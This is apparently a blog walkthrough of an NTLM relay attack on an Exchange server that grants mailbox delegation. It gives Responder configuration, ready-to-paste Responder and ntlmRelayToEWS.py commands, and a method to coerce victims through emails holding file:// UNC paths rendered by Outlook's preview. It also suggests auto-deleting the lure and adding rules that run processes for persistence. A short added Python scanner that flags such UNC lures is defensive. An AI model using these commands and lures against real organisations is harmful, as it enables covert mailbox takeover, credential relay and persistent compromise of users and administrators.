Exchange Mailbox Access Delegation

What is this about?

This is an NTLM relay attack pointed at an Exchange server, used to act on a user’s mailbox on their behalf.

The setup

We’re going to need two terminals: one for Responder, one for the relay script.

The Responder part

This is the tool to set up for this part. You’ll need to change SMB and HTTP to Off in the config, though.

; Servers to start
SQL = On
SMB = Off <- change this
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off <- change too
HTTPS = On
DNS = On
LDAP = On

You can now run your Responder with a basic

./Responder.py -I <your interface> -rv

You could throw in a -P, -w or a -b too, but hey, let’s keep it simple: you’re going to copy-paste this anyway without RTFM…

The Relaying part

Get this script and read its usage. We’re going for the addDelegate option, which adds delegated access to any given mailbox for a third-party user; this is normally used to let someone else manage your calendar, emails, appointments, …

By running the following copy-pasted command you’ll start the relay server, which uses the hash sent to it by Responder to authenticate as that user and add a delegate to the given mailbox.

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org

This is why you had to turn off the SMB/HTTP servers in Responder: they are no longer there to capture the hash and keep it for themselves, the relay script listens on those ports instead and forwards the authentication to the Exchange server.

The Best part

This also works over email against misconfigured on-prem Exchange servers combined with missing hardening on the endpoints, using basic UNC paths like file://your-responder-ip/whatever in the email body. It works against remote servers too, if the matching GPOs aren’t set. You can then relay the hash to the Exchange server and get delegated access to the mailbox of anyone pwned BY JUST RECEIVING AN EMAIL. The next step is simply to auto-delete the email from the mailbox, or to set a rule that automatically runs a process when a specific email is received. All of this thanks to the Outlook preview option ;)
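As an added defensive example, not from the original post or from the tools it uses: a small Python scanner that flags mail bodies carrying the file:// URLs or \\host\share UNC paths described above, so such messages can be quarantined before a preview pane renders them; the sample message, addresses and share host are constructed.

```python
import re
from email import message_from_string

# file:// URLs and \\host\share UNC paths: a client that auto-renders the
# message (preview pane) fetches them and, on a Windows host without outbound
# NTLM restrictions, authenticates to that host while doing so.
UNC_PATTERN = re.compile(
    r"(?:file://+|\\\\)([A-Za-z0-9_.\-]+)(?:[/\\][^\s\"'<>]*)?", re.IGNORECASE
)

def find_unc_references(text: str) -> list[str]:
    """Distinct hosts referenced by file:// URLs or UNC paths in some text."""
    return sorted({m.group(1).lower() for m in UNC_PATTERN.finditer(text)})

def scan_message(raw: str) -> list[str]:
    """Walk every text/plain and text/html part of a raw RFC 822 message and
    return the hosts its UNC-style references point at (empty: nothing to flag)."""
    hosts: set[str] = set()
    for part in message_from_string(raw).walk():
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue  # skips the multipart container and attachments
        payload = part.get_payload(decode=True)
        if payload is None:
            continue
        charset = part.get_content_charset() or "utf-8"
        hosts.update(find_unc_references(payload.decode(charset, "replace")))
    return sorted(hosts)

# Constructed sample message: the plain-text part carries the page's
# file://your-responder-ip/whatever lure, the HTML part a 1x1 image pulled
# from a made-up UNC share so a preview pane would fetch it silently.
SAMPLE_EMAIL = r"""From: accounting@example.invalid
To: someone@corporate.org
Subject: Q3 figures
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Figures are at file://your-responder-ip/whatever - have a look.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Figures are attached.</p>
<img src="\\10.0.0.5\share\pixel.png" width="1" height="1"></body></html>
--b1--
"""

if __name__ == "__main__":
    print("UNC hosts referenced:", scan_message(SAMPLE_EMAIL))  # ['10.0.0.5', 'your-responder-ip']
```

Flagging the lure is the detective side; the preventive side is what the post calls “the matching GPOs”, the outbound SMB/NTLM restrictions on endpoints that stop the client from authenticating to an arbitrary host in the first place.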

Another fun been-there-done-that one? You know what happens when one of your users forwards an email to your security/IT team to “know if it’s phishing or something”? Yep, the sender of that email is not external to your company anymore. This means the whitelisting and checks probably won’t be the same, and an internal sender may go through different rules than an external one. Yup, you have now pwned a random user and also users with potential admin access, even without knowing their email address or sending them anything, because a user forwarded the email to them.

Pwned by relayception! :D